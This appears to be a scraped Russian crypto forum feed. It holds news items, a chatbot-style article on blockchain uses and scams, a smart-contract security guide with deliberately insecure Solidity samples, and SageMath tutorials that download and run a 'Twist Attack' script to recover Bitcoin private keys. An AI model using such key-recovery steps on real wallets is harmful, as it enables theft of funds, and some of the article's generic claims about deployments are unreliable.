кодируют вредоносное ПО или подружатся с вами, чтобы позже попросить денег (будь то нигерийский принц или модель OnlyFans, которая отчаянно нуждается в помощи). Вторая категория состоит из бирж и банков, которые обещают хранить ваши монеты в безопасной среде, но ограничивают вас от вывода, когда их бизнес-модель находится под угрозой. Вы должны избегать обоих этих хакеров любой ценой, так как они, скорее всего, украдут ваш Биткоин. Конечно, вот несколько конкретных примеров того, как криптовалюты и технология блокчейна используются в реальных приложениях: Управление цепочкой поставок: IBM использует основанную на блокчейне систему под названием TrustChain для отслеживания движения алмазов от рудников до розничных продавцов. Система позволяет каждому участнику цепочки поставок проверять подлинность бриллиантов и обеспечивать их бесконфликтность. Управление идентификацией: правительство Гондураса использует систему на основе блокчейна для управления правами на землю своих граждан. Система позволяет землевладельцам безопасно регистрировать и передавать право собственности на свою собственность, снижая риск мошенничества и коррупции. Торговля энергией: стартап LO3 Energy использует основанную на блокчейне платформу TransActive Grid, чтобы позволить жителям Бруклина, штат Нью-Йорк, покупать и продавать возобновляемую энергию друг у друга. Платформа позволяет пользователям покупать и продавать энергию с помощью криптовалюты Exergy, создавая более эффективный и устойчивый энергетический рынок. Голосование: в 2018 году канцелярия госсекретаря Западной Вирджинии провела пилотную программу, в которой для голосования на первичных выборах в штате использовалась основанная на блокчейне система под названием Voatz. Система позволяла военнослужащим и другим избирателям, находящимся за границей, безопасно голосовать с помощью своих смартфонов. Это всего лишь несколько конкретных примеров того, как криптовалюты и технология блокчейн используются в реальном мире. Есть много других подобных приложений, и по мере того, как технология продолжает развиваться, вполне вероятно, что будут разрабатываться все более и более инновационные способы ее использования. Криптоиндустрия предполагает, что криптотехнологии могут быть использованы для целей интеллектуальной собственности, таких как эволюция системы патентования изобретений. Криптовалюты и технология блокчейн могут революционизировать способы управления и защиты интеллектуальной собственности. Одним из ключевых преимуществ этой технологии является возможность создания безопасных децентрализованных систем хранения и проверки информации. Это можно использовать для создания более эффективных и прозрачных систем защиты интеллектуальной собственности, такой как патенты, авторские права и товарные знаки. Например, технологию блокчейн можно использовать для создания защищенной и децентрализованной базы данных патентов, позволяющей изобретателям легко регистрировать и защищать свои изобретения. Блокчейн можно использовать для хранения сведений о каждом патенте, включая имя изобретателя, дату изобретения и описание изобретения. Эта информация может быть проверена и проверена с использованием криптографических методов, что гарантирует ее подлинность и целостность. Помимо создания более эффективных и прозрачных систем защиты интеллектуальной собственности, технология блокчейн может также использоваться для защиты прав интеллектуальной собственности. Например, смарт-контракты можно использовать для автоматического обеспечения соблюдения лицензионных соглашений, гарантируя, что изобретатели и создатели получат надлежащее вознаграждение за свою работу. В целом, использование криптовалют и технологии блокчейн может значительно улучшить способы управления и защиты интеллектуальной собственности. Поскольку технология продолжает развиваться, вполне вероятно, что будет разрабатываться все больше и больше приложений для этой технологии в сфере интеллектуальной собственности. Хотя размещение ваших монет на каком-либо банковском счете удобно, такой тип действий противоречит цели проекта Биткоин и значительно уменьшает ваш собственный финансовый суверенитет. Доверенные третьи стороны — это дыры в безопасности, и вы никогда не должны доверять человеку или компании, которые обещают удерживать ваши BTC в обмен на безопасность и/или доход. Конечно, существуют и другие типы социальных атак: поддельные электронные письма при обмене с просьбой подтвердить сид-фразу в ответе, звонящие, выдающие себя за службу кошелька, которая просит вас подтвердить ваши данные (иногда даже домашний адрес). перехвачены и скомпрометированы с помощью вставки сид-фразы BIP39 (злоумышленники оставляют в коробке свою сид-фразу, надеясь, что пользователи-новички отправят туда свои монеты), атак с ключом за 5 долларов и имитаторов, которые выдают себя за друзей или членов семьи, которым срочно нужны деньги доставка. Это те, которые становятся более распространенными по мере роста цены и распространения. Вот почему вам нужно знать о них и защищать себя, сводя к минимуму объем данных, которые вы предоставляете об услугах, которые вы используете, о месте, где вы живете, и о количестве Биткоинов, которые у вас есть. Возвращаясь к аргументу ChatGPT, было бы неискренним предполагать, что мошенники представляют серьезную угрозу для Биткоина. Сеть будет существовать и продолжать функционировать вопреки ворам. Конечно, многие люди могут бояться и отталкиваться от мысли об ответственности. Но мы не должны забывать, что решения для самообслуживания также со временем становятся более безопасными и удобными для пользователя. Слои Биткоина также становятся более развитыми, и открываются новые способы использования и хранения ваших денег. Например, проект Fedimint планирует создать общественные банки, в которых пользователи смогут разблокировать свои средства только с помощью селфи. Самое главное — создать культуру справедливости, подотчетности, передовой практики и правды. Возможно, криптотехнологии используются для отслеживания научных исследований? Или может есть такое приложение? Да, криптовалюты и технология блокчейн изучаются как потенциальные инструменты для отслеживания и управления научными исследованиями. Одной из ключевых проблем в научном сообществе является необходимость обеспечения целостности и прозрачности данных исследований. Технология блокчейн с ее способностью создавать безопасные и децентрализованные базы данных может решить эту проблему. Например, систему на основе блокчейна можно использовать для отслеживания хода научного исследования, от первоначального исследовательского предложения до окончательной публикации результатов. Блокчейн можно использовать для хранения деталей исследования, включая вопросы исследования, гипотезы, методы, результаты и выводы. Эта информация может быть подтверждена и проверена с использованием криптографических методов, обеспечивающих ее подлинность и целостность. Помимо отслеживания хода научных исследований, технологию блокчейн можно также использовать для управления процессом рецензирования. Блокчейн можно использовать для хранения обзоров и комментариев других ученых, что позволит исследователям легко просматривать и учитывать отзывы в своей работе. Это могло бы помочь улучшить качество и прозрачность процесса рецензирования. В целом, использование криптовалют и технологии блокчейн в сфере научных исследований может значительно повысить целостность и прозрачность исследовательского процесса. Поскольку технология продолжает развиваться, вполне вероятно, что будет разрабатываться все больше и больше приложений для этой технологии в области науки, и их приложениях: Криптовалюты — это цифровые активы, которые используют криптографию для защиты и проверки транзакций. Самая известная криптовалюта — Биткоин, но есть и много других, таких как Ethereum и Litecoin. Технология Blockchain — это базовая технология, которая поддерживает криптовалюты. Это децентрализованная, безопасная и прозрачная база данных, которая позволяет пользователям хранить и проверять информацию без необходимости в центральном органе. Одним из ключевых применений криптовалют и технологии блокчейн является цифровая рекламная индустрия. Такие проекты, как Basic Attention Token (BAT) и AdChain, используют эту технологию для создания более эффективных и прозрачных систем покупки и продажи рекламы. Криптовалюты и технология блокчейна также используются во множестве других приложений, включая управление цепочками поставок, управление идентификацией, торговлю энергией и голосование. В будущем криптовалюты и технология блокчейн, вероятно, получат более широкое распространение и будут интегрированы в основные финансовые и другие системы. Ключевые факторы, которые будут определять будущее этой технологии, включают разработку более удобных и безопасных технологий, принятие криптовалюты большим количеством предприятий и учреждений, а также регулирование рынка правительствами и другими организациями. В целом очевидно, что криптовалюты и технология блокчейн получают все большее признание и признание на правительственном уровне. Поскольку технология продолжает развиваться, вполне вероятно, что все больше и больше правительств будут изучать способы использования этой технологии для улучшения своей экономики и предоставления более качественных услуг своим гражданам. Любые подобные приложения в США или Европе? Да, в США и Европе есть несколько правительств, которые изучают возможности использования криптовалют и технологии блокчейн. Например, в Соединенных Штатах штат Огайо объявил о планах принять Биткоин в качестве формы оплаты налогов и других государственных сборов. В Европе правительство Эстонии использует систему на основе блокчейна для управления медицинскими записями своих граждан, а правительство Швейцарии работает над системой голосования на основе блокчейна. Помимо государственных приложений, в США и Европе также есть много компаний частного сектора, которые изучают возможности использования криптовалют и технологии блокчейн. Например, JPMorgan Chase, крупнейший банк США, разработал собственную криптовалюту под названием JPM Coin, которая используется для облегчения транзакций между его клиентами. В Европе энергетическая компания EON использует платформу на основе блокчейна, чтобы позволить своим клиентам покупать и продавать возобновляемую энергию друг у друга. В целом очевидно, что использование криптовалют и технологии блокчейн получает все большее признание и признание в Соединенных Штатах и Европе. Поскольку технология продолжает развиваться, вполне вероятно, что все больше и больше правительств и предприятий в этих регионах будут изучать способы использования этой технологии для улучшения своей деятельности и предоставления более качественных услуг своим клиентам. Заключение: Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/WZZv58aJ95E Источник: https://cryptodeep.ru/chatgpt-bitcoin Криптоанализ
-
Поправка, предложенная в законопроект о финансовых услугах и рынках, позволит криптокомпаниям, которые уже зарегистрированы в FCA, самостоятельно одобрять собственную рекламу. Принятие поправки позволит надзорным органам Великобритании, Управлению по финансовому надзору (FCA) и участникам крипторынка страны разрешить законодательную коллизию. В действующей версии закона о финансовых услугах и рынках содержится требование, чтобы вся рекламная активность криптокомпаний была особым образом одобрена специальным штатом квалифицированных специалистов. При этом регулирующие органы не могут сформулировать порядок и персоналии тех, кто именно должен одобрять рекламу цифровых активов. То есть большинство криптофирм оказалось не в состоянии сообщать о своих рекламных акциях, в отличие от фирм, предоставляющих традиционные финансовые услуги. Чтобы воспользоваться новой поправкой в закон, поставщики виртуальных цифровых активов будут обязаны подать заявку на регистрацию в FCA и лицензироваться в соответствии с режимом борьбы с отмыванием денег. По данным Казначейства Великобритании, поправка должна вступить в силу примерно через четыре месяца, давая криптовалютным компаниям время на необходимую адаптацию. Подробнее: https://bits.media/britanskie-zakonodateli-smyagchayut-trebovaniya-k-reklame-kriptovalyutnykh-uslug/
-
Американский банк Cross River, поддерживающий криптопроекты, получил указание от Федеральной корпорации по страхованию вкладов (FDIC) о прекращении данного вида деятельности. FDIC инициировала исполнительное производство о «небезопасной и ненадежной» банковской практике в отношении дружественного к криптовалюте банка Cross River. По сообщению FDIC, Cross River не смог организовать и поддерживать «эффективный внутренний контроль, информационные системы и разумную практику кредитного андеррайтинга». В предписании говорится, что в своей операционной деятельности банк руководствовался «небезопасными или необоснованными» методами работы. Комментируя распоряжение FDIC, пресс-служба Cross River сообщила, что правление банка согласилось усилить надзор и методы контроля, а также обеспечить принятие необходимых корректирующих мер. «Важно отметить, что в приказе не упоминаются дискриминационные практики или возмещения ущерба. Он также не накладывает особых ограничений на наши прочие партнерства или кредитные продукты, которые мы в настоящее время предлагаем», — заявил представитель Cross River. Подробнее: https://bits.media/cross-river-poluchil-predpisanie-fdic-o-nemedlennom-prekrashchenii-podderzhki-kriptoproektov/
-
Венчурные инвестиции в криптовалютные проекты на территории столицы штата Флорида сократились в первом квартале года на 92%, при этом финансирование стартапов из Силиконовой долины сократилось на 53%. По мнению обозревателей, падение инвестиционного интереса к криптовалютным проектам в Майями было частично вызвано замедлением развития и скандалами в индустрии криптовалют в США. Которая когда-то была настолько сильна в Майями, что город установил на центральной площади версию статуи атакующего быка с Уолл-стрит, но с лазерами из глаз. В ответ на спад финансирования криптовалютных проектов значительное число технических специалистов и компаний Майами стали сворачивать данное направление, уделяя криптографии и цифровым активам значительно меньшее время. На первый план вышли проекты, связанные с искусственным интеллектом, обороной и технологиями реального сектора экономики. Например, в планах венчурной инвестиционной компании Countdown Capital, которая прошлые годы активно вкладывалась в криптостартапы, в этом году криптовалюта даже не упоминается. Ранее мэр Майями Фрэнсис Суарес (Francis Suarez) неоднократно заявлял о готовности столицы штата стать столицей криптовалют и глубоком проникновении индустрии цифровых активов во все сферы деятельности. Чиновник обещал меры по привлечению криптопредпринимателей и активно внедрял биткоины в местную экономику через ночные клубы и ипотечное кредитование. До своего банкротства одна из крупнейших криптовалютных бирж мира FTX сообщала о планах по созданию представительства в городе, а также стала спонсором баскетбольной команды и стадиона Miami Heat. Подробнее: https://bits.media/smi-obem-finansirovaniya-kriptostartapov-mayyami-upal-na-92/
-
- Финансирование
- СМИ
-
(and 8 more)
Tagged with:
-
Популярный криптоаналитик прогнозирует резкое падение рыночной стоимости эфира с $1921 до $800 по причине дисбаланса справедливой и рыночной цены актива. Бенджамин Коуэн (Benjamin Cowen) записал видео для YouTube, где объявил: несмотря на рост стоимости эфира, который торгуется на уровне около $2 000, вторая по капитализации криптовалюта, вероятно, повторно протестирует минимумы в пределах верхней и нижней границ графика логарифмической регрессии. По данным Коуэна, линия тренда логарифмической регрессии справедливой стоимости эфира в настоящее время составляет около $800 долларов. Эксперт предупредил своих подписчиков о возможной рецессии и вероятности повтора поведения актива по модели 2019 и 2020 годов, когда ETH опускался ниже линии тренда логарифмической регрессии справедливой стоимости: «Я считаю, что инвесторы несколько преждевременно празднуют положительную динамику эфира, поскольку все еще сохраняется очень высокий риск отката ЕТН к предыдущему уровню и даже ниже». Подробнее: https://bits.media/bendzhamin-kouen-eth-mozhet-upast-v-tsene-bolee-chem-na-57-/
-
Управление по финансовым рынкам Франции анонсировало планы работ по приведению действующих в стране правил надзора и лицензирования криптокомпаний в соответствие с европейскими нормами свежепринятого закона MiCA. Управление по финансовым рынкам Франции (AMF) сообщает, что в связи с одобрением Европарламентом законопроекта о регулировании криптовалют в Евросоюзе (MiCA), ведомство разработало переходный план. Рассматривается возможность ускоренного лицензирования криптовалютных операторов и перехода от норм национального регулирования к правилам MiCA. Ведомство планирует привести в соответствие с европейскими нормами положения о необходимых резервах, конфликте интересов, хранении и документации для криптовалютных компаний, лицензирующих свою деятельность на территории Франции. Все ранее зарегистрированные на территории страны криптокомпании, таких как Binance или Bitstamp, получат 18 месяцев для организации договорной работы и предоставления отчетности в соответствии с новыми правилами Евросоюза. При этом деятельность компаний будет временно ограничена территорией Франции, говорят местные чиновники. На прошлой неделе Европейский парламент проголосовал за MiCA. Новые правила регулирования европейской криптоиндустрии должны вступить в силу в июле 2023 года. Подробнее: https://bits.media/frantsiya-zapuskaet-protseduru-perekhoda-k-unifitsirovannym-trebovaniyam-regulirovaniya-kriptoindust/
-
- Регулирование
- Франция
-
(and 6 more)
Tagged with:
-
Выручка аналитической компании Chainalysis за последний год увеличилась на 70%, а объем контрактов с государственными организациями превысил $65 млн, несмотря на кризис криптовалютного рынка. Соучредитель и генеральный директор Chainalysis Майкл Гронагер (Michael Gronager) в интервью The New York Times подчеркнул, что преследующий криптовалютную отрасль весь 2022 год кризис, не помешал его компании зарабатывать на продаже услуг. Гронагер отказался раскрыть точные данные о продажах, но заявил, что рост выручки был обеспечен за счет эффективной бизнес-модели. «Две трети наших доходов приходится на партнерские отношения с государственными учреждениями, в том числе с правоохранительными органами. Этот источник дохода остается относительно стабильным, даже в условиях, когда рынок рушится», – объяснил гендиректор. В апреле полиция города Калгари канадской провинции Альберта в партнерстве с аналитической компанией Chainalysis открыла Центр расследований преступлений, связанных с криптовалютами и блокчейном. Подробнее: https://bits.media/chainalysis-krizis-kriptorynka-ne-skazalsya-na-vyruchke-s-goskontraktov/
-
- Chainalysis
- Кризис
- (and 8 more)
-
CRYPTO DEEP TECH В этой статье мы сделаем новую установку SageMath в Google Colab. Ранее мы опубликовали статью: “Install SageMath for cryptanalysis on Fedora 64bit(10GB) Cloud Virtual Server” , но для продолжение криптоанализа блокчейна Биткоин многие наши читатели предпочитают использовать Debian и Ubuntu в отличие от Fedora. Как нам известно Google Colab обновился до версии "Ubuntu 20.04.5 LTS". !cat /etc/lsb-release Поэтому версии "Ubuntu 20.04.5 LTS", нам позволяет установит только SageMath version 9.0, Release Date: 2020-01-01 Используя стандартную команду установки: !sudo apt-get install -y sagemath-common Для полного проведения криптоанализа мы установим в Google Colab совершенно новую версию SageMath version 9.3 Файл: Install_SageMath_in_Google_Colab.ipynb мы опубликовали в GitHub Перейдем на официальный сайт: https://colab.research.google.com Теперь через утилиту wget скачаем tar-file: sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ !python3 relocate-once.py Все готово! !./sage -sh sage -v Все верно! Мы получили новую версию: SageMath version 9.3, Release Date: 2021-05-09 wget https://raw.githubusercontent.com/demining/CryptoDeepTools/bbd83042e7405508cd2e646ad1b0819da0f9c58d/18TwistAttack/discrete.py Теперь чтобы получить приватный ключ нам осталось запустить команду: python3 discrete.py Sage Math 9.3 выполним задачу дискретного логарифмирование (Pollard's rho algorithm for logarithms) Теперь все работает должный образом! Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/DBu0UnVe0ig Источник: https://cryptodeep.ru/install-sagemath-in-google-colab Криптоанализ
-
- Закрытыйключ
- Криптография
- (and 8 more)
-
Канадская компания Conifex Timber обратилась в высшую судебную инстанцию провинции Британская Колумбия с просьбой отменить местный мораторий на майнинг криптоактивов, а также потребовать от Управления гидроэнергетики (BC Hydro) возобновления поставок электроэнергии в необходимом объеме. В Conifex заявили, что правительство провинции при введении ограничений для майнинговых компаний превысило полномочия, делегированное на основании закона о комиссии по коммунальным предприятиям. Conifex намерена добивается отмены приказа главы Совета Британской Колумбии и признания данного моратория неконституционным, несанкционированным или иным образом недействительным. Помимо этого Conifex намерена требовать от BC Hydro возмещения убытков, понесенных компанией ввиду необоснованного прекращения деятельности майнинговых проектов. В уведомлении о гражданском иске утверждается, что невыполнение и отказ BC Hydro предоставить услуги для майнинговых проектов Conifex является нарушением обязательства BC Hydro по поставкам электроэнергии и несправедливо дискриминирует Conifex по отношению к другим коммерческим потребителям. Подробнее: https://bits.media/conifex-timber-podala-isk-k-energeticheskoy-kompanii-bc-hydro-za-vosprepyatstvovanie-mayningu/
-
- Майнинг
- Электроэнергия
-
(and 8 more)
Tagged with:
-
В этой статье мы подробно на слайдах покажем как установить «SageMath» на облачный виртуальный сервер Fedora 30 64bit(10GB) для примера мы будем использовать сервера «DIGITAL RUBLE TECH». Ранее мы использовали для установки «SageMath» облачный сервис Google Colab, но к сожалению из-за последних обновлении не все компоненты для проведение криптоанализа блокчейна Биткоина работают должным образом. Регистрация: cat /etc/redhat-release dnf check-update dnf install python3 dnf install sagemath sage -v git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Sage Math выполнил задачу дискретного логарифмирование (Pollard's rho algorithm for logarithms) Теперь все работает должный образом! Исходный код DIGITAL RUBLE TECH Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/xHnTDRgZwvE Источник: https://cryptodeep.ru/install-sagemath-on-fedora Криптоанализ
-
- Закрытыйключ
- Криптография
- (and 8 more)
-
Телекомпания KBS со ссылкой на правоохранительные органы Южной Кореи сообщила, что офицеры полиции задержали трех подозреваемых в убийстве основательницы неназванного криптовалютного проекта. 48-летняя женщина была похищена возле своего дома, а затем убита в пригороде Сеула. Официальный представитель полиции отказался в интересах следствия раскрыть имя жертвы и название криптопроекта. По крайней мере до тех пор, пока органы следствия не получат необходимые данные от экспертов по криптографии из Сеульского полицейского управления. Как стало известно СМИ от источников близких к следствию, группа преступников требовала у жертвы возврата криптоактивов на сумму более 190 млн вон (около $150 000). Полиция предполагает, что в деле замешан еще один участник, заплативший преступникам деньги за совершение убийства. Ранее канадские СМИ сообщили о похищении самопровозглашенного «Крипто Короля», основателя обанкротившегося криптопроекта AP Private Equity Эйдена Плетерски (Aiden Pleterski). В течение трех дней он подвергался пыткам и избиениям — преступники пытались получить выкуп в обмен за его жизнь. Подробнее: https://bits.media/politsiya-seula-rassleduet-ubiystvo-osnovatelnitsy-kriptoproekta/
-
Намерение американского сенатора построить свою предвыборную кампанию вокруг создания «армии против криптографии» вызвало негодование со стороны представителей заинтересованной общественности. В совместном обращении президентов трех некоммерческих объединений Club for Growth, Americans for Tax Reform и FreedomWorks Дэвида Макинтоша (David McIntosh), Гровера Норквиста (Grover Norquist) и Адама Брэндона (Adam Brandon) к представителям парламента США, высказывается озабоченность в отношении активизации усилий сенатора Элизабет Уоррен по введению новых правил в отношении цифровых активов и компаний. «Мы крайне разочарованы попытками атаковать компании, занимающиеся цифровыми активами и работой таких сенаторов, как Элизабет Уоррен, которые ограничивают экономические свободы. Капитализм свободного рынка создал больше богатства и процветания, чем любая другая экономическая система в мировой истории. Мы выступаем против попыток подавить инновации, наказать создателей новых рабочих мест и объектов для инвестиций нового поколения в Америке», — говорится в обращении общественников-бизнесменов. Критические заявления представителей криптоиндустрии США разделяет редколлегия крупного медиа CoinDesk. Комментируя недавние действия федерального правительства, представители CoinDesk заявили, что как журналисты они стараются придерживаться нейтральной позиции, однако ситуация демонстрирует, что за нападками на отрасль может прослеживаться скоординированная попытка властей нанести вред индустрии цифровых активов. Подробнее: https://bits.media/prizyv-elizabet-uorren-k-sozdaniyu-antikriptoarmii-podvergsya-negativnoy-kritike-so-storony-oppozits/
- 1 reply
-
- США
- Криптография
- (and 6 more)
-
Президент страны, сделавшей биткоин официальным платежным средством, объявил о новом шаге на пути к трансформации Сальвадора в мировой центр криптоиндустрии: об отмене всех налогов для технологических компаний. Найиб Букеле (Nayib Bukele) заявил, что на следующей неделе направит в Конгресс страны соответствующий законопроект: «Законопроект будет касаться отмены всех налогов на доходы, имущество, прирост капитала и импортные пошлины для технологических инноваций, таких как программирование, кодирование, приложения и разработка ИИ, а также производство компьютерного и коммуникационного оборудования». В начале марта Найиб Букеле сообщил, что благодаря легализации биткоина туристический сектор экономики страны вырос на 95%, что благоприятно отразилось на Сальвадоре в целом. Подробнее: https://bits.media/kongress-salvadora-obsudit-zakonoproekt-ob-otmene-vsekh-nalogov-dlya-kriptoinnovatorov/
- 7 replies
-
- Конгресс
- Искусственный_интеллект
- (and 5 more)
-
В России скоро выйдет книга сооснователя сети Эфириума «Больше денег. Что такое Ethereum и как блокчейн меняет мир». Книга посвящена истории развитии второго по капитализации блокчейна. Труд Виталика Бутерина подготовило к выходу в свет московское издательство Individuum. В введении к книге ее редактор и составитель, профессор кафедры медиа Колорадского университета Натан Шнайдер (Nathan Schneider) сообщает читателям, что перед ними — это сборник статей, написанных Виталиком Бутериным с 2014-го по 2023 годы, систематизированных в хронологическом порядке. «По мере проникновения криптовалют в экономический̆ мейнстрим все чаще разгораются дебаты: стоит ли вернуть джинна обратно в бутылку, если это вообще возможно? Со временем люди, задающиеся вопросом, замечают, как и Бутерин, что их интересует уже не столько "стоит ли", а все более разнообразные варианты ответа на вопрос: как с этим жить», — пишет Натан Шнайдер. В начале марта сооснователь Эфириума Виталик Бутерин опубликовал статью, в которой рассказал о нескольких проблемных случаях при оплате с помощью ETH и призвал ускорить масштабирование сети Эфириума. Подробнее: https://bits.media/na-russkom-yazyke-vykhodit-kniga-vitalika-buterina/
- 1 reply
-
- Виталик_Бутерин
- Эфириум
- (and 8 more)
-
Повышение общей безопасности экосистемы от атак на смарт-контракты
CryptoDeepTech posted a blog entry in ECDSA
Front-Running AKA Transaction-Ordering Dependence The University of Concordia considers front-running to be, “a course of action where an entity benefits from prior access to privileged market information about upcoming transactions and trades.” This knowledge of future events in a market can lead to exploitation. For example, knowing that a very large purchase of a specific token is going to occur, a bad actor can purchase that token in advance, and sell the token for a profit when the oversized buy order increases the price. Front-running attacks have long been an issue in financial markets, and due to blockchain’s transparent nature, the problem is coming up again in cryptocurrency markets. Since the solution to this problem varies on a per contract basis, it can be hard to protect against. Possible solutions include batching transactions and using a pre-commit scheme, i.e. allow users to submit details at a later time. PDF: SoK: Transparent Dishonesty: Front-Running Attacks on Blockchain Frontrunning Since all transactions are visible in the mempool for a short while before being executed, observers of the network can see and react to an action before it is included in a block. An example of how this can be exploited is with a decentralized exchange where a buy order transaction can be seen, and second order can be broadcast and executed before the first transaction is included. Protecting against this is difficult, as it would come down to the specific contract itself. Front-running, coined originally for traditional financial markets, is the race to order the chaos to the winner’s benefit. In financial markets, the flow of information gave birth to intermediaries that could simply profit by being the first to know and react to some information. These attacks mostly had been within stock market deals and early domain registries, such as whois gateways. front-run·ning (/ˌfrəntˈrəniNG/) noun: front-running; STOCK MARKETthe practice by market makers of dealing on advance information provided by their brokers and investment analysts, before their clients have been given the information. Taxonomy By defining a taxonomy and differentiating each group from another, we can make it easier to discuss the problem and find solutions for each group. We define the following categories of front-running attacks: Displacement Insertion Suppression Displacement In the first type of attack, a displacement attack, it is not important for Alice’s (User) function call to run after Mallory (Adversary) runs her function. Alice’s can be orphaned or run with no meaningful effect. Examples of displacement include: Alice trying to register a domain name and Mallory registering it first; Alice trying to submit a bug to receive a bounty and Mallory stealing it and submitting it first; Alice trying to submit a bid in an auction and Mallory copying it. This attack is commonly performed by increasing the gasPrice higher than network average, often by a multiplier of 10 or more. Insertion For this type of attack, it is important to the adversary that the original function call runs after her transaction. In an insertion attack, after Mallory runs her function, the state of the contract is changed and she needs Alice’s original function to run on this modified state. For example, if Alice places a purchase order on a blockchain asset at a higher price than the best offer, Mallory will insert two transactions: she will purchase at the best offer price and then offer the same asset for sale at Alice’s slightly higher purchase price. If Alice’s transaction is then run after, Mallory will profit on the price difference without having to hold the asset. As with displacement attacks, this is usually done by outbidding Alice’s transaction in the gas price auction. Transaction Order Dependence Transaction Order Dependence is equivalent to race condition in smart contracts. An example, if one function sets the reward percentage, and the withdraw function uses that percentage; then withdraw transaction can be front-run by a change reward function call, which impacts the amount that will be withdrawn eventually. See SWC-114 Suppression In a suppression attack, a.k.a Block Stuffing attacks, after Mallory runs her function, she tries to delay Alice from running her function. This was the case with the first winner of the “Fomo3d” game and some other on-chain hacks. The attacker sent multiple transactions with a high gasPrice and gasLimit to custom smart contracts that assert (or use other means) to consume all the gas and fill up the block’s gasLimit. Variants Each of these attacks has two variants, asymmetric and bulk. In some cases, Alice and Mallory are performing different operations. For example, Alice is trying to cancel an offer, and Mallory is trying to fulfill it first. We call this asymmetric displacement. In other cases, Mallory is trying to run a large set of functions: for example, Alice and others are trying to buy a limited set of shares offered by a firm on a blockchain. We call this bulk displacement. Mitigations Front-running is a pervasive issue on public blockchains such as Ethereum. The best remediation is to remove the benefit of front-running in your application, mainly by removing the importance of transaction ordering or time. For example, in markets, it would be better to implement batch auctions (this also protects against high-frequency trading concerns). Another way is to use a pre-commit scheme (“I’m going to submit the details later”). A third option is to mitigate the cost of front-running by specifying a maximum or minimum acceptable price range on a trade, thereby limiting price slippage. Transaction Ordering: Go-Ethereum (Geth) nodes order the transactions based on their gasPrice and address nonce. This, however, results in a gas auction between participants in the network to get included in the block currently being mined. Confidentiality: Another approach is to limit the visibility of the transactions, this can be done using a “commit and reveal” scheme. A simple implementation is to store the keccak256 hash of the data in the first transaction, then reveal the data and verify it against the hash in the second transaction. However note that the transaction itself leaks the intention and possibly the value of the collateralization. There are enhanced commit and reveal schemes that are more secure, however require more transactions to function, e.g. DoS with Block Gas Limit In the Ethereum blockchain, the blocks all have a gas limit. One of the benefits of a block gas limit is that it prevents attackers from creating an infinite transaction loop, but if the gas usage of a transaction exceeds this limit, the transaction will fail. This can lead to a DoS attack in a couple different ways. Unbounded Operations A situation in which the block gas limit can be an issue is in sending funds to an array of addresses. Even without any malicious intent, this can easily go wrong. Just by having too large an array of users to pay can max out the gas limit and prevent the transaction from ever succeeding. This situation can also lead to an attack. Say a bad actor decides to create a significant amount of addresses, with each address being paid a small amount of funds from the smart contract. If done effectively, the transaction can be blocked indefinitely, possibly even preventing further transactions from going through. An effective solution to this problem would be to use a pull payment system over the current push payment system. To do this, separate each payment into it’s own transaction, and have the recipient call the function. If, for some reason, you really need to loop through an array of unspecified length, at least expect it to potentially take multiple blocks, and allow it to be performed in multiple transactions – as seen in this example: struct Payee { address addr; uint256 value; } Payee[] payees; uint256 nextPayeeIndex; function payOut() { uint256 i = nextPayeeIndex; while (i < payees.length && msg.gas > 200000) { payees[i].addr.send(payees[i].value); i++; } nextPayeeIndex = i; } Block Stuffing In some situations, your contract can be attacked with a block gas limit even if you don’t loop through an array of unspecified length. An attacker can fill several blocks before a transaction can be processed by using a sufficiently high gas price. This attack is done by issuing several transactions at a very high gas price. If the gas price is high enough, and the transactions consume enough gas, they can fill entire blocks and prevent other transactions from being processed. Ethereum transactions require the sender to pay gas to disincentivize spam attacks, but in some situations, there can be enough incentive to go through with such an attack. For example, a block stuffing attack was used on a gambling Dapp, Fomo3D. The app had a countdown timer, and users could win a jackpot by being the last to purchase a key, except everytime a user bought a key, the timer would be extended. An attacker bought a key then stuffed the next 13 blocks and a row so they could win the jackpot. To prevent such attacks from occuring, it’s important to carefully consider whether it’s safe to incorporate time-based actions in your application. Denial of Service DoS with (Unexpected) revert Consider a simple auction contract: // INSECURE contract Auction { address currentLeader; uint highestBid; function bid() payable { require(msg.value > highestBid); require(currentLeader.send(highestBid)); // Refund the old leader, if it fails then revert currentLeader = msg.sender; highestBid = msg.value; } } If attacker bids using a smart contract which has a fallback function that reverts any payment, the attacker can win any auction. When it tries to refund the old leader, it reverts if the refund fails. This means that a malicious bidder can become the leader while making sure that any refunds to their address will always fail. In this way, they can prevent anyone else from calling the bid() function, and stay the leader forever. A recommendation is to set up a pull payment system instead, as described earlier. Another example is when a contract may iterate through an array to pay users (e.g., supporters in a crowdfunding contract). It’s common to want to make sure that each payment succeeds. If not, one should revert. The issue is that if one call fails, you are reverting the whole payout system, meaning the loop will never complete. No one gets paid because one address is forcing an error. address[] private refundAddresses; mapping (address => uint) public refunds; // bad function refundAll() public { for(uint x; x < refundAddresses.length; x++) { // arbitrary length iteration based on how many addresses participated require(refundAddresses[x].send(refunds[refundAddresses[x]])) // doubly bad, now a single failure on send will hold up all funds } } Again, the recommended solution is to favor pull over push payments. See SWC-113 DoS with Block Gas Limit Each block has an upper bound on the amount of gas that can be spent, and thus the amount computation that can be done. This is the Block Gas Limit. If the gas spent exceeds this limit, the transaction will fail. This leads to a couple of possible Denial of Service vectors: Gas Limit DoS on a Contract via Unbounded Operations You may have noticed another problem with the previous example: by paying out to everyone at once, you risk running into the block gas limit. This can lead to problems even in the absence of an intentional attack. However, it’s especially bad if an attacker can manipulate the amount of gas needed. In the case of the previous example, the attacker could add a bunch of addresses, each of which needs to get a very small refund. The gas cost of refunding each of the attacker’s addresses could, therefore, end up being more than the gas limit, blocking the refund transaction from happening at all. This is another reason to favor pull over push payments. If you absolutely must loop over an array of unknown size, then you should plan for it to potentially take multiple blocks, and therefore require multiple transactions. You will need to keep track of how far you’ve gone, and be able to resume from that point, as in the following example: struct Payee { address addr; uint256 value; } Payee[] payees; uint256 nextPayeeIndex; function payOut() { uint256 i = nextPayeeIndex; while (i < payees.length && gasleft() > 